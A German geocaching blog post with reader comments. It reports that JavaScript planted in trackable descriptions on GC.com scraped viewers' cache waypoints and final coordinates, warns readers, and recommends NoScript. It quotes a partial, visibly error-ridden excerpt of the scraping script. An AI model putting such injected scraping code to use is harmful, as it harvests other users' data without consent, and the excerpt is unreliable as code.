Dreister Finalkoordinatenklau per Javascript

Während auf GC.com in den Cachebeschreibungen und im Profil Javascript nicht mehr möglich ist, hat Groundspeak dies bei den Trackableseiten wohl vergessen. Mit einem kleinen Javascriptaufruf in der Beschreibung des TBs oder der Coin ist es möglich, alle Wegpunkte der angelegten Caches zu spidern und so an fremde Finalkoordinaten zu gelangen.

script.jpg

Auszug aus dem Skript vom zugehörigen Server


function readlistings() {
if (http.readyState == 4) {
var text = http.responsText;
var i = 1
while(1) {
pos = text.indexOf(„seek/cache_details.aspx?guid=“);
if(pos <= 0) break;
listings[i] = text.sub(pos+29, 34);
i=i+1;
text = text.app(pos+27);
}
}
}
function extractWP() {
for (wphttp.readState == 4) {
var wptext = wpttp.responseText;
var poscname = wptext.indexOf(„cache_details.aspx“);
var cnmstart = wptext.sub(poscname+49, 60);

So gesehen bei einer GEO FORTRESS First Austrian Mega Event Geocoin im Münchner Raum, die in einen Mikro eingeloggt war (wurde in der Zwischenzeit schon herausgenommen). Diese wurde zum Glück nur von wenigen Cachern discovered, deren komplette Finalkoordinaten dürften jetzt allerdings dem Coinowner bekannt sein. Den Finaldieb habe ich gerade angeschrieben und eine mail über den großen Teich geschickt. Wer auf Nummer Sicher gehen will, sollte vor dem Loggen oder Discovern von Trackables Javascript im Browser deaktivieren, bis diese Lücke von Groundspeak dicht gemacht wurde!
Sollte der Scriptschreiber nicht auf meine mail reagieren und so weitermachen, fühle ich mich genötigt etwas Dreistcacherbashing zu betreiben und den Namen zu veröffentlichen!  :evil:
Sowas ist wirklich unterste Schublade!
Mein Dank gilt dem Informant, der diese Schweinerei aufgedeckt hat!

Nachtrag: Das war wohl kein Einzelfall. Mittlerweile habe ich noch von einer anderen Coin erfahren, diesmal eine 2006 CITO Geocoin und die wurde schon von vielen Cachern weitertransportiert und discovered! Gleiches Script, gleicher Server. Auch diesen Cacher habe ich jetzt angeschrieben.

Nachtrag II: Mehr als 4 Wochen danach ist die Sicherheitslücke noch präsent. Wer schauen möchte ob es immer noch möglich ist Daten zu klauen: Zum Foreneintrag auf GC.com
Oder gleich auf direktem Weg zum TB: Klick
Abhilfe: Firefox und das AddOn NoScript!

Tags » , «

Autor:
Datum: Mittwoch, 26. August 2009 17:30
Trackback: Trackback-URL Themengebiet: Allgemein

Feed zum Beitrag: RSS 2.0 Diesen Artikel kommentieren

Kommentar abgeben

Erlaubte HTML-Tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

*

:) 
:D 
:( 
:o 
8O 
:-? 
8) 
:lol: 
:x 
:P 
:ups: 
:cry: 
:evil: 
:twisted: 
:roll: 
;) 
:idee: 
:| 
:mrgreen: 
:XD: 
:ugly: 
:freu: 
:freu2: 
:motz: 
:lachtot: 
:irre: 
:hilfe: 
:wallbash: 
:gott: 
:zensur: 
O_o 
:bravo: 
:pfeif: 
:ja: 
:nein: 
:maul: 
:doh: 
:girl: 
:winken: 
:sm: 
:2Cents: 
:verzweifelt: 
 

30 Kommentare

  1. 30

    ich lese leider jetzt erst hierüber und finde die Idee richtig cool.
    Ich lasse mir nie Finalkoordinaten von Mysties verraten, weil mir das den Spass an der Sache verdirbt, aber ich finde den Programmieransatz samt Idee sehr gut und finde, dass das auch eine Art von Lösen des Caches ist.

    …vermutlich geht das mittlerweile auch schon garnicht mehr, aber dafür kann der Bundestrojaner das jetzt bestimmt ;)

    .

  2. 29

    Nachtrag II hinzugefügt.

  3. 28

    @BlackyV:  Stimmt leider nicht. Es ist noch immer möglich solchen Code in der Beschreibung zu verstecken.
    Also weiterhin vorsichtig sein.
     

  4. 27

    Die Lücke ist übrigens seit einigen Tagen geschlossen: auch TB-Beschreibungen werden nun auf Java-Scripte geparst.

  5. 26

    „Wer von euch telefonjokerfrei ist, werfe den ersten Stein…“

    *Stein werf*

  6. 25

    Also ich find’s eigentlich genial. Warum immer die Phobie davor, einen Cache mal nicht so zu machen wie vom Owner befohlen. So ein Script zeigt doch zumindest Gehirnschmalz.

  7. 24

    Hiho,

    Ich kann jedem nur das „No Script“ Addon von Firefox ans Herz legen.

    Atti

  8. 23

    @GC-Surfer: Dann muss ich dir leider mitteilen, dass du keinen blassen Schimmer hast. Lern erst mal anonym surfen bevor du irgendwelchen Quatsch von dir gibst. ;-)

  9. 22

    Schreibe schon seit einiger Zeit an einem ähnlichen Script.
    Nun weiß ich was ich falsch gemacht habe.
    Jetzt funktionierts!

    merci :-)

  10. 21

    @JR: Die Karte funktioniert auch ohne google-analytics, google.com muss allerdings sein.

  11. 20

    Für Firefoxnutzer gibt es NoScript, ein kleines Plugin welches das Ausführen von Javascript unterbindet bzw. nur auf vertrauenswürdigen Seiten zulässt (hier kann man, wenn einmal zugelassen, diverse auf der Seite verwendete Skripte wieder deaktivieren). Da sieht man erst einmal wo und für was alles Javascript verwendet wird. :-o Googleanalytics bei GC.com? Vermutlich wegen der Karte…
    Ganz nebenbei ist die Werbung bei Non-PM auch gleich verschwunden. :-D

  12. 19

    […] in den Sinn kam dieser Ausspruch bereits bei der Ansicht des Titels zu einem höchst interessanten Artikel in JR849s Blog, der über einen Java-Script-Angriff in der Beschreibung einer Coin berichtet. Zur Erläuterung: […]

  13. 18

    Ich denke, es ist völlig richtig, auf solch ein Thema aufmerksam zu machen. Nur so werden die Leute für möglichen Missbrauch sensibilisiert.

    Die, die solche Scripte einsetzen wollen, werden sich das in Zukunft genauer überlegen. Es ist dem Ruf sicher nicht förderlich, wenn das öffentlich wird. Es ist doch schon nochmal was anderes, ob ich jemanden nach einem Myst-Final frage, oder ob ich mir das heimlich hintenrum mit Tricks besorge.

    BTW verstösst der Einsatz eines solchen Datensammel-Scripts natürlich auch gegen die Terms of Use von Groundspeak.

  14. 17

    Schade das man mit google nicht nach Code-Stücken suchen kann, sonst wären schnell alle coins ausfindig gemacht ):

  15. 16

    Krasse Sache… Meiner Meinung nach ist es wichtig, wenn Leute mit den entsprechenden Fähigkeiten solche Schwachstellen suchen und davor warnen. Als Test und Erklärung für den Site-Admin kann man ja auch mal nen Exploit schreiben, aber selber damit Daten sammeln überschreitet die Grenze zwischen Hacker und Cracker :-(

  16. 15

    Na ich bin ja mal gespannt, wieviele Leute den Code jetzt dazu verwenden ihre eigenen Coins zu präparieren. War vielleicht nicht so Weise den Source (und sei es nur Auszugsweise) hier einzustellen. Jetzt hast Du die Leute auf ein Thema aufmerksam gemacht, was eigentlich unter Verschluß gehalten gehört bis Groundspeak das Problem gefixed hat.

    Zugeben wird’s natürlich keiner, daß er das Script bald selbst im Einsatz haben wird – is klar.

    Ohne jetzt zu Kleinlich werden zu wollen, aber hast Du den „Owner“ des Scripts gefragt, ob Du das Script hier öffentlich abdrucken darfst? Schandtat hin oder her, aber solltest Du das nicht getan haben verstößt Du gegen sein Urheberrecht. Nur für den Fall, daß er dir auch an’s Bein pinkeln will hätte er somit was in der Hand… Nur so ein Gedanke.

  17. 14

    hehe, schicke geschichte. aus geocachingsicht sicher unsportlich, aus hackersicht doch recht sportlich ;-)
    aber es ist doch so: muss doch jeder selbst wissen, ob er sich behummst oder nicht.
    und ob ich nun so an die finalkoords komme oder jemand anrufe oder die finalkoordinaten für die summe x im hunderterpack kaufe/verkaufe ist aus meiner sich ein und dasselbe

  18. 13

    Sowas gibts auch schon? Wie geil ist das denn! Sollte als ausspähen von Daten schon eine Straftat sein. Und das für dusselige Spielkoordinaten.

  19. 12

    Ich bin ja fast froh das ich nicht weiss wer der Fiesling ist.

    Die Abwägung zwischen Täterschutz und Opferschutz wäre bei mir wohl deutlich zugunsten der Opfer ausgefallen.

  20. 11

    Was für ein scheinheiliges Gartenzwerggetue hier. Der schlimmste Feind im ganzen Land, ist und bleibt der Denunziant. Warum überhaupt so aufregen, es ist doch nur ein Spiel! Und wenn jemandem nur die Punkte wichtig sind, dann laßt ihn doch loggen und kümmert euch nicht drum! Mehr Erfolg als durch Telefonjoker und/oder Stammtischgetratsch wird er mit dieser Methode auch nicht haben.

    Wer von euch telefonjokerfrei ist, werfe den ersten Stein…

  21. 10

    Habe Groundspeak schon vor mehr als einem halben Jahr auf eine ähnliche Lücke hingewiesen. Javascripts sind auf Profil und Cachebschreibungen zwar geblockt, lassen sich aber sogar dort noch über Umwege einbetten.

    Problem bei der Geschichte scheint zu sein, dass das Content-Management-System nicht direkt von Groundspeak, sondern von einem Subcontractor stammen zu scheint, was das Fixen des ganzen wohl signifikant verlängert.

    Für Firefoxnutzer kann ich nur noscript (http://noscript.net/) empfehlen, was es erlaubt, javascript nur bei Bedarf zu aktivieren.

    Die Erklärung für technische Analphabeten:
    Javascript ist eine Art Programmiersprache, die in Webseiten eingebettet werden kann. Diese wird dann vom Browser des Betrachtenden ausgeführt. Diese Art von Programm wurde in die Bschreibung der Coin eingefügt. Wird das Programm ausgeführt, so kann diese Programm gegenüber GC.com beliebige Befehle (oder „Clicks“) ausführen, die nicht von denen des Benutzers zu unterscheiden sind. In diesem Fall wurde wohl die Liste der Multi-Stages und Mysteries ausgelesen und die Koordinaten an den Programmschreiber geschickt. Ohne Panik machen zu wollen, aber an dieser Stelle ließe sich bspw. auch der Account des betrachtenden Nutzers löschen, etc.

    Hoffe, diese Lücke wird bald geschlossen.

    Grüße,
    Florian

  22. 9

    @The Hawks: Leider lassen die Umstände wie die Coin eingesetzt wurde darauf schliessen, dass es nur darum ging die Final-Koordinaten eines Caches zu ermitteln.

    Aus meiner Sicht also keineswegs ein Kavaliersdelikt.

  23. 8

    Daß so etwas Übles aus der Feder der „AufgedrehtPufferspeicherGruppe“ kommt…
    Ich bin schockiert!

  24. 7

    Das Ganze nennt sich dann CSRF (Croos-Site Request Forgery) und *sollte* sowohl vom Browser als auch von Groundspeak verhindert werden.

    Es stellt sich noch die Frage nach den Absichten des Autors. Wenn er damit ein Prove of Concept gegen Groundspeak vorhat, ist das Ganze aus miener SIcht völlig legitim.

    Ein Problem wäre persönliche Bereicherung.

  25. 6

    Unglaublich! Wenn die Meldungen so weiter gehen vergeht einem bald wirklich der Spaß am Hobby.

  26. 5

    @Skrell: Danke für die Nichtinformatikerhilfe, irgendwie denke ich immer zu fachspezifisch. :-D
    @Elli: siehe SKRELL ;-)

  27. 4

    @ElliPirelli:
    Wenn Du zum Loggen der Coin dessen Beschreibung aufrufst, wird ein Script ausgeführt, welches dann mit Deinen Logindaten auf die für Dich sichtbaren Daten bei GC zugreifen kann. Und diese können dann natürlich auch weitergeleitet werden.

    Auf was für Ideen die Leute kommen. In der Zeit der Scriptentwicklung hätte der User sicher schon einige Multis machen können…

    Gruss
    Thomas

  28. 3

    Geht das bitte noch mal für technische Analphabeten erklärt? Ich versteh nur Bahnhof.

    Wieso sollte ein Trackable das Final spoilern?

    Ratlos, ElliPirelli

  29. 2

    was es nicht alles gibt, …. ohne Worte

  30. 1

    shocked……